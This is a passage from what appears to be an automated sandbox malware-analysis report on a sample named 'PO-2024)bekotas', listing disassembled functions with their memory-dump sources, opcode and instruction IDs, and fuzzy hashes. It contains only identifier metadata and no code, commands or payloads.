                                        • Opcode Fuzzy Hash: a2659f58fa1f768f92ae93d4f0751317146fc30df677ef7a1fcabddb3ca3b12c
                                        • Instruction Fuzzy Hash: B7E06535A001199FCB10DA6DE8096DEB7F5FB88315F004965E955D3344D7306919CFC0
                                        Function 050FCE38 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ec1f9043ecbcd6e82124674d20731892b263a960acd02db5b11db5414c755bf
                                        • Instruction ID: 53ad438e9a290247abe3ce6db2f90416d111076168c1631f51b786a359ebe194
                                        • Opcode Fuzzy Hash: 0ec1f9043ecbcd6e82124674d20731892b263a960acd02db5b11db5414c755bf
                                        • Instruction Fuzzy Hash: CFE092322001586BCB059F4AE800EAE7FDEDFC9310B048416F959C7121CA75D81197A0
                                        Function 050F2B2A Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74358154c70e14dc0674cb35ebe8fa8918aef5afee4488d9d4429dd6ca191d9d
                                        • Instruction ID: 224fc537adc4eb938ef8446f1406483be4f0db0eb5b508a6ee70d8cd996a5040
                                        • Opcode Fuzzy Hash: 74358154c70e14dc0674cb35ebe8fa8918aef5afee4488d9d4429dd6ca191d9d
                                        • Instruction Fuzzy Hash: B5E04F347440144BE704EB6CF862BEE37AAE7C8740F444025F245CB396DE699C025791
                                        Function 050F7E90 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3afa159a32b9a51eb361048aabd3bec4c3551432e73dc05dedf68cc24785a8a
                                        • Instruction ID: ac1a83e20103f14fb72e857770b2ab9087f17e0957e734388e4b2ab940ffc397
                                        • Opcode Fuzzy Hash: a3afa159a32b9a51eb361048aabd3bec4c3551432e73dc05dedf68cc24785a8a
                                        • Instruction Fuzzy Hash: 8BE012322041345FD6059B58E805AD93BADDB49621B1041A6F905C7361DA61DD0286D5
                                        Function 050F68C6 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d496d89e132db249b6f14f216a07cfbc62346c7b31b927296e4e4dde07717c88
                                        • Instruction ID: a04d41310d9281f779232d10ff36cea74f5d1284b44ca45dcfe71588d72bac83
                                        • Opcode Fuzzy Hash: d496d89e132db249b6f14f216a07cfbc62346c7b31b927296e4e4dde07717c88
                                        • Instruction Fuzzy Hash: 63E04FB1D5021DDACF149B91F6047FDBFB1FB4425AF24062AE212B2950C7720991CB90
                                        Function 050F2B38 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74c67f0793dd4a6f1056e05c33b04899fd88c7b33281287f234d677b672b460e
                                        • Instruction ID: 11ad4d05116acffa451ef7fb42bfc90d46c69bc996aeeaa385549c495f8889ae
                                        • Opcode Fuzzy Hash: 74c67f0793dd4a6f1056e05c33b04899fd88c7b33281287f234d677b672b460e
                                        • Instruction Fuzzy Hash: B8E0C22070401817D304FA9DF822BAE37EEEBC8A80F804025E305CB387EE799C0103E6
                                        Function 050F2B00 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00a5ba1249c4aa749714c5b13e8e79670db9b6326de998e040922318cd3089c5
                                        • Instruction ID: e8fccf39c69836ead2991b79bd43ed148689253f5ca8e79c0942aa221704011f
                                        • Opcode Fuzzy Hash: 00a5ba1249c4aa749714c5b13e8e79670db9b6326de998e040922318cd3089c5
                                        • Instruction Fuzzy Hash: 88D05E323541248FC340DBB8F849E967BECEB48665B0540A6F60CCB621DAA2D80087C0
                                        Function 050FDB50 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4632d36300bfff421c62a9b568c44c985fffd4eb3e7f9ca56f85a491faf6711b
                                        • Instruction ID: bb7e91771d80ee7c59f5f1353f3879353d4c7c8d5b48870fa3ec1ccab7be2ac4
                                        • Opcode Fuzzy Hash: 4632d36300bfff421c62a9b568c44c985fffd4eb3e7f9ca56f85a491faf6711b
                                        • Instruction Fuzzy Hash: F3E0E532614014CFCB40DE68E4887EC37F5BB44326F4040A4E1099B2A1CF34D946CB10
                                        Function 050F8749 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30549fb78a6ad227a70376723d71f995dbb56cbf0e00f69b6a69aaabf6e98eee
                                        • Instruction ID: 2b910aecfa0fe56d17578423efc51e49b09f852a85a1169f13afc45de8d84dad
                                        • Opcode Fuzzy Hash: 30549fb78a6ad227a70376723d71f995dbb56cbf0e00f69b6a69aaabf6e98eee
                                        • Instruction Fuzzy Hash: 3FD0A7B39143004BD704EB38ED8AB8E7BE5AB94300F08C93ED585C6204E935C156D753
                                        Function 050F2C30 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7838e4a548c53358c10435c686b604dc740b2a80f2c4c0b2d4f907ff94216d6
                                        • Instruction ID: 03a2f6630e9b37ab268a19133ca42969b491918966f06ee1dcb6fe4c778241cd
                                        • Opcode Fuzzy Hash: a7838e4a548c53358c10435c686b604dc740b2a80f2c4c0b2d4f907ff94216d6
                                        • Instruction Fuzzy Hash: 14D0A9322000643FDA0323E16C24BFB7FADBB4B758F682089E3840F112D593A863D780
                                        Function 050FBAA8 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d7770580a5606c4195e9fd2d3e0f6b93c9e66ae963ecb317bb33a2e9fc64f80
                                        • Instruction ID: 14921db13c44126b769b763fca8a7d8f39d149344cfafb42b0b9de2e502d77f7
                                        • Opcode Fuzzy Hash: 9d7770580a5606c4195e9fd2d3e0f6b93c9e66ae963ecb317bb33a2e9fc64f80
                                        • Instruction Fuzzy Hash: 41D0A7B62483497FD742ABE0CC01D977F79EB18650B048186FA484F292C171E852C766
                                        Function 050F7EA0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bdb490746a0a6d69d7ec4f6e0e1c130b271e382dda60466ea8794833c890a853
                                        • Instruction ID: 4da65fc4cb5ae144f9b28fae21b838c52cdb2f447ab28ec59085d3ca3afbbab2
                                        • Opcode Fuzzy Hash: bdb490746a0a6d69d7ec4f6e0e1c130b271e382dda60466ea8794833c890a853
                                        • Instruction Fuzzy Hash: 61D0C9363501249F87059B58E404CA97BADEB5D66231140A6F909C7371CE71DC52CBD4
                                        Function 050F9F10 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aea1199e0002afe1e9e86e9c636822908cc1b3ee186dc8a067fbcd5abd45045e
                                        • Instruction ID: 02915aa43b57d5b95930166cc59f08e617c4902ac1a391fcfccafac3f8ae4676
                                        • Opcode Fuzzy Hash: aea1199e0002afe1e9e86e9c636822908cc1b3ee186dc8a067fbcd5abd45045e
                                        • Instruction Fuzzy Hash: C4C0127740575147DB105B34F4813C66AD98FA1610F54C57DA1D487A05D17488128791
                                        Function 050F2C40 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56b0bedd64de1da9a2f41e6b389552caa4426f12984ffc3ef3e4bfbc1601afb4
                                        • Instruction ID: 1bea76a304c05ce4faf203d46c7a1430d93b7f372e4f63ceb4224665e2693609
                                        • Opcode Fuzzy Hash: 56b0bedd64de1da9a2f41e6b389552caa4426f12984ffc3ef3e4bfbc1601afb4
                                        • Instruction Fuzzy Hash: 39C08C333001247FDA0136C4AD05DEABB2DFB89AA8B28008AF7080F102D6A3EC5387D0
                                        Function 050F49D0 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 816a2741a5c7d8198f275db9c2506060875b14b653744320860ac348de341696
                                        • Instruction ID: 5d1801ec68fd869649c9e544e1092af1b12c5de9ff791f4ad0a93777eed19045
                                        • Opcode Fuzzy Hash: 816a2741a5c7d8198f275db9c2506060875b14b653744320860ac348de341696
                                        • Instruction Fuzzy Hash: CFE01274A44105CFCB00DF64D059A9DBFB0FF0C310F208415E515E7650CB345808CF50
                                        Function 050F4430 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24511ac5330ac9c4ada7ab6b62b2cba6ce21d25aa62b89d21498055299f2417e
                                        • Instruction ID: 64f8ea64d556d66562e020f1a05c25eff726c22d436282ea8ca2b7dc9a34f01a
                                        • Opcode Fuzzy Hash: 24511ac5330ac9c4ada7ab6b62b2cba6ce21d25aa62b89d21498055299f2417e
                                        • Instruction Fuzzy Hash: 50D0C9344122868EEF02AB60F866BA53FA5F702300F156050E0A1021AAE728988BEF50
                                        Function 050FEF39 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8f7d512804715e1385e589fe9fb820daccc3344677a5560bf5d7277aeb6d427
                                        • Instruction ID: b7ff499a09dd2fe96e185000a61de30919b8c85310e7d1176ff1ab0ae38c258b
                                        • Opcode Fuzzy Hash: f8f7d512804715e1385e589fe9fb820daccc3344677a5560bf5d7277aeb6d427
                                        • Instruction Fuzzy Hash: B8B0926F494A1ACBC3010BF0FB1B7803E38E704282F6AC819F59985B68CA2195066549
                                        Function 050FBAB8 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea95ae04ae076a1de0d521a6407ef62cbd6297b919a4b6944c21cde00d1a0451
                                        • Instruction ID: 96c2a8109748805411d4cc9df4d479a2165aa36f2f011f35cc31ec6b969474d9
                                        • Opcode Fuzzy Hash: ea95ae04ae076a1de0d521a6407ef62cbd6297b919a4b6944c21cde00d1a0451
                                        • Instruction Fuzzy Hash: BDC0123A200208AFEA80AA94D840D9A7769BB18610F509001BA080A201C2B2E8A2DBA0
                                        Function 050FB388 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb975f97e50f1abdd29777f1e06da87b7a1a376195dd37869df61c6c66c13d08
                                        • Instruction ID: babc02ace7f12606716370b486f3f43c8268c2319a69f930e8e79f31d0099146
                                        • Opcode Fuzzy Hash: bb975f97e50f1abdd29777f1e06da87b7a1a376195dd37869df61c6c66c13d08
                                        • Instruction Fuzzy Hash: 04C08C2028824052C041A268A081A2DAB90ABA2300F40C849620849182C4108C0A8B13
                                        Function 050F9E30 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5715bc1758b7be67d33f0f497d515deffb9286f32f2cb91fd40ed44eca507aef
                                        • Instruction ID: cfc6e3b9292a1194964975a51714ca59ef41cadabd9b8d7381aaeb6bc1e6733e
                                        • Opcode Fuzzy Hash: 5715bc1758b7be67d33f0f497d515deffb9286f32f2cb91fd40ed44eca507aef
                                        • Instruction Fuzzy Hash: 44C048AA6052861ADB411761D90A3C97F20AB63614FE840AEC0C158E82E7A9411AC36A
                                        Function 050FD8B0 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0cd487693b75bd5d1abdf683240980a5519efce84cd10bc27d6b6d0b6fe140e
                                        • Instruction ID: 6f40346cd96dcc2a045b15ba7119ed1cc70f396cd86b81485f8156d569d30633
                                        • Opcode Fuzzy Hash: e0cd487693b75bd5d1abdf683240980a5519efce84cd10bc27d6b6d0b6fe140e
                                        • Instruction Fuzzy Hash: E0B012F3C00104B3CD00CB20DC0D78F17D5DB13300F659480C001C1201DC218103E822
                                        Function 050FF555 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3acb975929875d0ebf679bc4fae47d614c16ccecef1337a793ff8d4f1eb02acf
                                        • Instruction ID: 9460a5751f74ebec22ba3df7becd1338019b958aff73f4cbcac7cbd63e8b9366
                                        • Opcode Fuzzy Hash: 3acb975929875d0ebf679bc4fae47d614c16ccecef1337a793ff8d4f1eb02acf
                                        • Instruction Fuzzy Hash: 67C02B70403008CAC708DFE0D1F219FFEAEA7C4700B306106D10175784C1248B414305
                                        Function 050F4200 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 86672ee2660ef2b5149e59ec62db1213fb908fd82732f86586c37b444f5664df
                                        • Instruction ID: 4ae20f1be62d60acc87a184bba4ff650f7bd067911de832e9dcde7bdfa2cc995
                                        • Opcode Fuzzy Hash: 86672ee2660ef2b5149e59ec62db1213fb908fd82732f86586c37b444f5664df
                                        • Instruction Fuzzy Hash: 22B092269500414ECF019B20EC1A7CA7F249B02304F04A991D140CB2D2DA25C822D250
                                        Function 050FEF48 Relevance: .0, Instructions: 6COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c92714bebb0de584ce84a18d2f4dc0abfeca260a5fd721f3d4d89d3f3093e84
                                        • Instruction ID: 31f4d2c8114ec7c7b519c5552b7810cc1299aa151e3e3af63886672060cc5a3c
                                        • Opcode Fuzzy Hash: 8c92714bebb0de584ce84a18d2f4dc0abfeca260a5fd721f3d4d89d3f3093e84
                                        • Instruction Fuzzy Hash: 46A002320A8A1CCFC6403FB5FA1F5597FBCEA48796F80C06DFA0F89515DF6568108A99
                                        Function 050F7901 Relevance: .0, Instructions: 6COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe915612e9c48ff1813113b7891f18b736b3d6870d602e42a73bb8a73e3a1706
                                        • Instruction ID: 5b60fa77946ea3d8c031b73b9658e3375701a9579dec176ec945bbfff41df413
                                        • Opcode Fuzzy Hash: fe915612e9c48ff1813113b7891f18b736b3d6870d602e42a73bb8a73e3a1706
                                        • Instruction Fuzzy Hash: 5FB012EBC2484167CF001760EC5934C3F70EF11309F980886C000C0287D506C0228622

                                        Non-executed Functions

                                        Function 04AF77D8 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH]q$PH]q
                                        • API String ID: 0-1166926398
                                        • Opcode ID: b9bbe7b6fe9fc6011dc0cdff6bee09fb3ca3b3ef0d1becb48a38d4904dccf22a
                                        • Instruction ID: f9e7eef11556b523ace06940c12fd3deff31f110e7518f6a0ac860ef2e4c7fa3
                                        • Opcode Fuzzy Hash: b9bbe7b6fe9fc6011dc0cdff6bee09fb3ca3b3ef0d1becb48a38d4904dccf22a
                                        • Instruction Fuzzy Hash: 9DD1B638B005058FDB58DFA9C998EA9B7F1BF4D701F2580A8E545AB365DB31AD40CF60
                                        Function 04AF6738 Relevance: .3, Instructions: 344COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce8af0c14227fdaa49ccc5a7509e2b1c6120416796b84ab91997d4b26046d27e
                                        • Instruction ID: a10fb7b66fc9c6427a2d8e9e3bad02f13968836c6bd9b310e6c5ddc718493484
                                        • Opcode Fuzzy Hash: ce8af0c14227fdaa49ccc5a7509e2b1c6120416796b84ab91997d4b26046d27e
                                        • Instruction Fuzzy Hash: 47C1CC307016049FEB19EBB5C9A07AA77FAAF88304F54846DE246DB290DF35E806CB51
                                        Function 050B0040 Relevance: .3, Instructions: 315COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017165313.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0f284c1782712e4bd00d0d6c63494ae52d5f0cb2bfb06985d54315baf85e9de
                                        • Instruction ID: 5d0eacadc5e17ec6cd0bf563b942f8424d263a94f11a8761f99eaf89bed508dd
                                        • Opcode Fuzzy Hash: a0f284c1782712e4bd00d0d6c63494ae52d5f0cb2bfb06985d54315baf85e9de
                                        • Instruction Fuzzy Hash: 601292F4C817458BE710CF65EC4C1897BB1BB85318BD24A09DE612A2E1EFB8956BCF44
                                        Function 04AF0D90 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94797475a0f395813b8926bf1de1e1e6fa7b9c7a9eee34cf323dce85a7a8c4dd
                                        • Instruction ID: 7bf7b0df4e7cd2eba61f286a76ea4d3ea5a66cc1f9a2c2dda342f239eea22126
                                        • Opcode Fuzzy Hash: 94797475a0f395813b8926bf1de1e1e6fa7b9c7a9eee34cf323dce85a7a8c4dd
                                        • Instruction Fuzzy Hash: 93E11874E001598FDB14DFA9C9809AEFBB2FF89305F248169E914AB356D731AD42CF60
                                        Function 04AF1740 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a37fdcdec3257883e94849015186d2e28db85b3a17e030749de2cb9397988c0
                                        • Instruction ID: eacb5df54a2859e13c53eae3c6dccf96d887706f52267ab232eaca4c92b93cff
                                        • Opcode Fuzzy Hash: 8a37fdcdec3257883e94849015186d2e28db85b3a17e030749de2cb9397988c0
                                        • Instruction Fuzzy Hash: F8E1FA74E00159CFCB14DFA9C9909AEBBB2FF89305F248159E514AB35AD731AD42CFA0
                                        Function 011BD364 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c129434e87234a47d8946087d6403d88e30b38dbf26c0b1084cc4d3cf3e4a56d
                                        • Instruction ID: 55cdc977dd8c61eb9f660ecb3142fb4ddf21f2652cd822ebb3000d2947d1248e
                                        • Opcode Fuzzy Hash: c129434e87234a47d8946087d6403d88e30b38dbf26c0b1084cc4d3cf3e4a56d
                                        • Instruction Fuzzy Hash: 4BA17236E0021ACFCF09DFB8C8845DEBBB2FF85304B15856AE905AB265DB31D956CB50
                                        Function 050B0006 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017165313.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9db6fc0bcb2ba2bb354f61c278cba7eb0a54bacf66278f77ed4e014c077c0322
                                        • Instruction ID: 17db6d21a078d860e49032184cf3d32ebc54f419e008cfc4cc1fdff1434d6929
                                        • Opcode Fuzzy Hash: 9db6fc0bcb2ba2bb354f61c278cba7eb0a54bacf66278f77ed4e014c077c0322
                                        • Instruction Fuzzy Hash: 8AC106F0C807468BD711CF65EC481897BB1BB85318F964A09DE616B2E1EFB8946BCF44
                                        Function 050FA5A0 Relevance: 7.6, Strings: 6, Instructions: 99COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                        • API String ID: 0-471056614
                                        • Opcode ID: 6d2aa9fff46792cea49e9a278263362f973768fe3bdb3de2477cc6189adec1f8
                                        • Instruction ID: 9e868339eeaf55d28244e2418e616e90c19d8ef6a87b34e6ad7585c84e0b04dc
                                        • Opcode Fuzzy Hash: 6d2aa9fff46792cea49e9a278263362f973768fe3bdb3de2477cc6189adec1f8
                                        • Instruction Fuzzy Hash: 7A413270E412098FCB0CEF64EC9159E7BB6FF44304BC1486AD4459B2A5EF34AD26DB91
                                        Function 050FA5B0 Relevance: 7.6, Strings: 6, Instructions: 95COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
